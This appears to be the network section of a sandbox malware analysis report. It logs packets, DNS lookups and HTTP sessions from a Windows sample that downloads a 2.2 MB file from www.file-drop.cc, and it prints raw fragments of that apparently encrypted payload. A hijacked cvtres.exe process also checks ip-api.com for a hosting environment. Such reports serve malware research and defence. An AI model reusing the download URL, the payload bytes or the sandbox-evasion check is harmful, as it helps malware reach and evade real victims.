Apr 19, 2024 07:35:59.559772968 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.559818983 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.559833050 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.559860945 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.559890985 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.561642885 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.561661959 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.561708927 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.561727047 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.561748981 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.561769009 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.562652111 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.562673092 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.562717915 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.562731028 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.562756062 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.562777996 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.563626051 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.563646078 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.563704014 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.563715935 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.563740969 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.563760996 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.565393925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.565414906 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.565463066 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.565475941 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.565502882 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.565527916 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.567826033 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.567847013 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.567912102 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.567925930 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.567976952 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.568412066 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.568432093 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.568475962 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.568487883 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.568512917 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.568530083 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.569359064 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.569379091 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.569586039 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.569598913 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.569658995 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.570995092 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.571014881 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.571075916 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.571089029 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.571114063 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.571135998 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.579770088 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.579834938 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.579858065 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.579873085 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.579911947 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.579931974 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.580573082 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.580621004 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.580651045 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.580662966 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.580688000 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.580729961 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.581526041 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.581573009 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.581598997 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.581613064 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.581648111 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.581665039 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.583105087 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.583148003 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.583200932 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.583216906 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.583239079 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.583264112 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.584208012 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.584254980 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.584280968 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.584292889 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.584317923 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.584335089 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.585089922 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.585136890 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.585165977 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.585182905 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.585205078 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.585235119 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.586030006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.586078882 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.586107016 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.586118937 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.586144924 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.586167097 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.587816954 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.587862015 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.587888956 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.587902069 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.587932110 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.587951899 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.588934898 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.588979006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.589011908 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.589024067 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.589049101 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.589072943 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.589776039 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.589823961 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.589848995 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.589869022 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.589890003 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.589911938 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.590728998 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.590774059 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.590799093 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.590811014 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.590835094 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.590853930 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.592382908 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.592432976 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.592463970 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.592475891 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.592503071 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.592521906 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.593424082 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.593472958 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.593498945 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.593516111 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.593539953 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.593539953 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.593564987 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.594343901 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.594396114 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.594420910 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.594432116 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.594460964 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.594477892 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.595263958 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.595318079 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.595347881 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.595360041 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.595386028 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.595407009 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.597127914 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.597174883 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.597201109 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.597222090 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.597248077 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.597268105 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.597984076 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.598028898 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.598059893 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.598071098 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.598114967 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.598134995 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.598938942 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.598984957 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.599009991 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.599025011 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.599062920 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.599080086 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.599798918 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.599855900 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.599883080 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.599895000 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.599936008 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.599936008 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601552010 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601596117 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601622105 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601634026 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601660013 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601677895 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601702929 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601772070 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601783991 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601836920 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.601903915 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.601959944 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.629004955 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:36:03.827543974 CEST	49732	80	192.168.2.4	208.95.112.1
Apr 19, 2024 07:36:03.944783926 CEST	80	49732	208.95.112.1	192.168.2.4
Apr 19, 2024 07:36:03.945097923 CEST	49732	80	192.168.2.4	208.95.112.1
Apr 19, 2024 07:36:03.945394993 CEST	49732	80	192.168.2.4	208.95.112.1
Apr 19, 2024 07:36:04.125818014 CEST	80	49732	208.95.112.1	192.168.2.4
Apr 19, 2024 07:36:04.176074028 CEST	49732	80	192.168.2.4	208.95.112.1
Apr 19, 2024 07:36:13.689116955 CEST	49732	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 07:35:58.376580954 CEST	56830	53	192.168.2.4	1.1.1.1
Apr 19, 2024 07:35:58.517651081 CEST	53	56830	1.1.1.1	192.168.2.4
Apr 19, 2024 07:36:03.717397928 CEST	51908	53	192.168.2.4	1.1.1.1
Apr 19, 2024 07:36:03.822567940 CEST	53	51908	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 07:35:58.376580954 CEST	192.168.2.4	1.1.1.1	0x64dd	Standard query (0)	www.file-drop.cc	A (IP address)	IN (0x0001)	false
Apr 19, 2024 07:36:03.717397928 CEST	192.168.2.4	1.1.1.1	0xdc18	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 07:35:58.517651081 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	www.file-drop.cc	172.67.146.180	A (IP address)	IN (0x0001)	false
Apr 19, 2024 07:35:58.517651081 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	www.file-drop.cc	104.21.95.172	A (IP address)	IN (0x0001)	false
Apr 19, 2024 07:36:03.822567940 CEST	1.1.1.1	192.168.2.4	0xdc18	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.file-drop.cc

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	208.95.112.1	80	6752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 07:36:03.945394993 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 19, 2024 07:36:04.125818014 CEST	174	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:36:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.146.180	443	6916	C:\Users\user\Desktop\KjCBSM7Ukv.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-19 05:35:58 UTC	86	OUT	GET /D/6829ab/Fizvmrd.vdf HTTP/1.1 Host: www.file-drop.cc Connection: Keep-Alive
2024-04-19 05:35:59 UTC	629	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:35:58 GMT Content-Length: 2225672 Connection: close Last-Modified: Fri, 19 Apr 2024 04:42:44 GMT ETag: "21f608-6166bb8021b60" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QO3OxwuiKE7DOFk8WHBAz4uy%2F2baJyA6UA9yrppGzVRK9dlJMOT5BX6I3oiiH0sNW1J9j1pi%2BBpTD92YxFB4Ng%2FR3ZMU4pk2gbj39pwaH8Dnw%2FIHrgiaQlpwl5mOlU72k41D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 876a88c9696fad70-ATL alt-svc: h3=":443"; ma=86400
2024-04-19 05:35:59 UTC	740	IN	Data Raw: d9 da 5c 9d e4 15 aa 7b 69 53 5b 3d f7 c1 ac 73 7b ed 1f e4 83 09 5b a8 14 9e 13 ed bc 2b 6b 53 76 13 af 90 b9 68 c1 20 70 6b 7e 8e 69 5a cc 09 cb d5 a1 94 7f 64 a1 99 48 39 83 07 63 3f 70 8f 21 58 1a a5 cd 1f fd 90 a1 f8 d7 00 14 33 5c 80 35 49 4b 1b 39 21 7f 0b 70 2b 1d b6 bf cc e8 5e 48 20 d7 5c 94 a2 53 5b 55 9c 74 49 d5 ba b1 c6 83 00 08 d2 1b 22 a4 86 fc 5f 1c f8 ff 4e e6 3a f1 8e a1 0a 8f 68 36 a2 0f 0e 2a 53 6c 05 46 0f bd 91 a0 d8 5a 88 f0 af 7b 10 e1 f9 fc 25 bc e7 b3 c0 b7 a0 87 58 2c 30 10 2b e4 9c 4b 9b 54 50 0a 04 e3 e4 af 76 ac 0f da 7a 50 2c 55 8f a5 16 cd f8 c9 7e 13 96 41 c7 86 d8 f8 14 5d 68 93 b8 ec d4 2a b1 a5 c0 0a 8e 52 78 f8 31 b6 95 5d 6e 43 a2 2c 0a 2c 6c 8e e7 af 7d 6c a2 86 e3 b0 6c 10 51 02 97 ea e0 05 1d 24 90 02 a4 01 c7 c4 Data Ascii: \{iS[=s{[+kSvh pk~iZdH9c?p!X3\5IK9!p+^H \S[UtI"_N:h6SlFZ{%X,0+KTPvzP,U~A]hRx1]nC,,l}llQ$
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 23 e0 08 6b 61 e6 0f cf 5a 0a 66 df 8a 2a bd f2 e5 00 c8 b2 a4 88 53 c3 ff be cc 85 c9 38 83 7c 50 d0 1b 47 36 d5 74 fa 86 35 16 be 5b ed 11 04 2e 28 6d b4 95 d6 ba dc 0b 84 4b 4a f2 5f 9a a9 45 52 5a be db c2 02 c8 d9 4e d7 1a 3c 5f 46 03 a8 5b 8d 03 9f 0e 82 b6 c6 bd 85 2c 03 3a 94 de 4d 5b c5 0b 00 b2 17 9c 51 c0 97 28 64 e4 86 58 89 3b 9e 0f d5 ea 31 db a1 e0 d1 be 61 96 4e e3 74 27 54 74 4c 14 37 f2 a8 b8 05 8c 5a a0 77 e9 66 f4 c0 33 b6 6c e3 8e 28 47 19 d6 d4 e1 00 4e 64 ba 90 a7 66 32 53 e7 77 4e 2d 22 99 af 94 6c cb 15 19 fb fd 50 f5 2d 8e 24 a8 db fe 88 4d ac 95 52 d3 1c b2 c0 c9 1b e7 39 62 c1 cc c2 1b fd 75 a0 64 d0 b5 fb 1c 1d 75 a8 2b 0e e1 4e d9 cd 07 47 53 17 39 01 32 72 e1 a9 da da 81 7d 65 6d 37 b1 11 ee 3e 1b 13 e9 77 c6 ef 9b a1 b8 53 Data Ascii: #kaZf*S8\|PG6t5[.(mKJ_ERZN<_F[,:M[Q(dX;1aNt'TtL7Zwf3l(GNdf2SwN-"lP-$MR9budu+NGS92r}em7>wS
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: b5 e1 55 97 9e 04 97 2f fa 43 76 40 ed 37 cd 1a c5 33 95 dc 8b 18 e2 01 83 56 62 cf 34 18 2c 07 6b ab 59 a4 a9 84 b9 c5 cc 87 76 3d d9 1b ff cb e7 ec be 50 b3 3b 0c 9c cb 21 03 0c c8 17 04 86 a1 d6 27 73 c3 f8 de 42 9b e6 29 c7 30 fc 35 88 83 03 7d 69 44 66 72 9d 70 48 eb 3e 42 c3 91 1c 47 ad 94 8c 47 90 32 7d 86 d0 4c 5f 8a 19 1d 35 b7 41 70 d2 26 5d c0 90 b3 be 8b 26 1f fe 11 d1 ec 1c 4e 5b 73 25 00 eb d6 f0 6e 3c 92 d2 85 8c dc 60 45 97 48 0f 55 e4 36 9f f9 6e a6 8f 8e f6 8c 10 fc 40 bb 88 8d 46 fd 56 f7 17 3f 57 43 7b d5 ca f7 a4 1b d5 b8 7c 17 ea cb 15 2c de 3f 96 31 b9 8f 4b a9 ef a1 11 e7 57 e5 bd 5b e7 56 29 1d ad 17 4f d7 5f 16 ad e2 08 f1 1a b8 1f 11 64 fa f7 34 83 c4 05 36 2e 96 83 71 20 2d bc 0d cc 30 01 76 b3 10 0c 19 7e 10 0a 60 75 41 6c d4 Data Ascii: U/Cv@73Vb4,kYv=P;!'sB)05}iDfrpH>BGG2}L_5Ap&]&N[s%n<`EHU6n@FV?WC{\|,?1KW[V)O_d46.q -0v~`uAl
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 33 26 38 fd 4a 05 cb 9d 6b db 81 96 2d 32 14 bd 88 e9 02 75 88 3f 74 21 82 e0 b0 a6 dc 59 64 a1 54 57 7a a6 00 8a c6 fc a3 3c ee 32 a4 08 d2 e9 2d d0 cf 18 25 89 51 54 5a 33 8c 43 ba 54 22 75 dc cd 09 a0 e8 57 9a de c9 e6 a3 e8 1f 28 b7 e4 bf bb 30 72 f7 3d 04 41 ba e4 fe 26 af 96 48 09 20 9a e7 57 65 d6 34 06 77 19 ae 5b 24 85 a9 0e cf 27 73 bc 8e ed 8e b5 3e 10 a2 02 7c db 67 89 f3 da 32 0d 01 94 7f 4c 9d 92 a2 81 a0 be 3c ac fe 44 8b 39 6d 2f 90 03 f9 6b f9 53 e3 f4 35 7f b1 a8 96 ba 19 42 b6 e4 41 c5 50 2c c4 22 a7 ab 82 ba 0a 57 45 5a 44 0a e2 ab 91 94 10 df 9b 8a 81 c5 8b 30 99 53 17 3a 2f 58 07 cf 41 6c fb 8a 02 6d 1c 66 e0 f5 3a 11 ed cf 5b 60 82 35 ee ce 80 8f e0 74 b4 7a e9 3c 52 89 7a 40 00 5b a9 df ca d3 40 cd b9 2a 8e 49 5b c5 ea 10 74 33 39 Data Ascii: 3&8Jk-2u?t!YdTWz<2-%QTZ3CT"uW(0r=A&H We4w[$'s>\|g2L<D9m/kS5BAP,"WEZD0S:/XAlmf:[`5tz<Rz@[@*I[t39
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 11 bd 0a 86 ca 89 72 a9 0f e3 75 a3 ff 0e 43 78 de 1b bb b6 e5 20 27 aa 96 33 7d b6 fe 08 cd c2 17 90 5f 2a 6c d2 a8 6f 64 c8 b0 5f 92 0f 07 cf 94 ce c1 4d 34 a6 87 4a c6 f4 09 8d d4 ca d9 c1 48 85 d9 c0 9a 50 06 4d 5f 0a 12 9e ed 2b 48 80 32 5d f0 b1 83 41 ce 2e 21 b7 2f d3 10 16 0e 2c fd 50 99 77 7e c9 70 ec 26 77 60 6f 20 38 9a a8 fe ae 91 9f 1d a4 d5 b9 6a 12 e5 e3 1c d1 fe 08 eb 1c 72 c1 d1 5b a2 60 1a 08 32 df b4 e8 d8 f5 00 a0 3c ba 6e 56 96 2b cf 9c 00 f1 54 31 f6 fb ff 90 b4 97 63 fa af 5b 6a b6 06 e7 f3 98 60 65 c2 f8 a0 71 de 92 f2 58 cd 93 f0 ad c3 a2 63 52 56 c8 7f 61 6e 53 98 81 ec 27 85 d3 df ec 46 ef 51 83 14 e5 d8 a1 af ef 7b 44 bc e0 69 d0 b9 d5 b1 d3 b3 23 1c 4e 3b 34 00 cc 94 6a 22 31 77 1d 71 b7 66 9c 55 36 07 20 8c ca 35 92 67 bd ce Data Ascii: ruCx '3}_*lod_M4JHPM_+H2]A.!/,Pw~p&w`o 8jr[`2<nV+T1c[j`eqXcRVanS'FQ{Di#N;4j"1wqfU6 5g
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 80 3b 79 9a 4a e8 b5 ae 3d cc a0 e6 bd 48 23 11 01 11 77 66 73 a7 7f 4f 34 8b 74 09 6f da b6 e2 fb 08 e1 07 74 08 c3 66 7b 5d 78 92 52 c5 8f 08 d1 78 92 04 99 79 08 71 c2 be 77 12 9f bf 9c 6b 59 00 9e 7e 9a b7 7f 0b 09 2d 86 ed e1 c0 6e 43 08 e8 c6 2b 40 a0 2a a8 3a 8f 13 0e eb cd fb a9 4e 8d 87 5a 9e 9e 0a 8b 83 fb 62 9d 92 0a 3a 70 ea 90 c6 93 f4 9e e4 96 d1 06 b8 ae 6e 8e d6 07 0c 3e f1 e4 83 d9 48 08 99 84 ed 52 49 be 6b 1e 53 05 e9 14 6f 27 41 1b f3 3e 6f 5f 7c c1 a4 b9 a2 af 93 c6 ab a3 0f df ff ea 55 a2 2e d5 94 31 1a d3 e7 db 30 37 e0 01 af 08 9c f2 d9 df 30 16 5e f3 16 ac a4 58 5d a2 b9 5e b1 f9 e1 2e a9 d2 d8 3d 08 e2 b3 ab 8c 8c 51 9e 34 7d 20 50 b1 ad 06 f1 0f d0 07 6d 3c 8f fc b8 26 37 8a 4e d4 fe 41 6a e5 6b 11 f2 b6 8a 3d fe 21 89 bb 77 24 Data Ascii: ;yJ=H#wfsO4totf{]xRxyqwkY~-nC+@*:NZb:pn>HRIkSo'A>o_\|U.1070^X]^.=Q4} Pm<&7NAjk=!w$
